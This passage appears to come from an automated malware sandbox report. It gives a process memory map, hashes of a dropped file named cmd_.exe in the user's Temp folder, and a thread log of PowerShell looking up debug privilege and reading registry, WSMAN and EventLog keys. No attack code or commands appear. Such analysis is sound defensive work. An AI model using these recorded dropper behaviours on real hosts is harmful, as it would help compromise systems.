| ole32.dll | 0x76d90000 | 0x76eebfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x76ef0000 | 0x76f8cfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x77090000 | 0x7722cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x772b0000 | 0x7733efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77340000 | 0x7747bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x774d0000 | 0x7756ffff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77580000 | 0x77580fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 66 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe | 101.61 KB |
MD5:
5473299167525c8d0addb8248900606a
SHA1: fa99241ee9581f281544423881cf702375d33c23 SHA256: bc1fc69f9747dc034ece7d9bb795c5e596d9be6ca71efe75c6c0fd18f3cbfbf5 SSDeep: 3072:Zb7luhxIgK+DNYIiRs1T8M7Eu6KX1wke3G:Zb7luYgKKNxiRsOM7E0QW |
|
|
Threads
Thread 0xab8
579
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
12 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\BMe1N39jU1 6criBQ\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
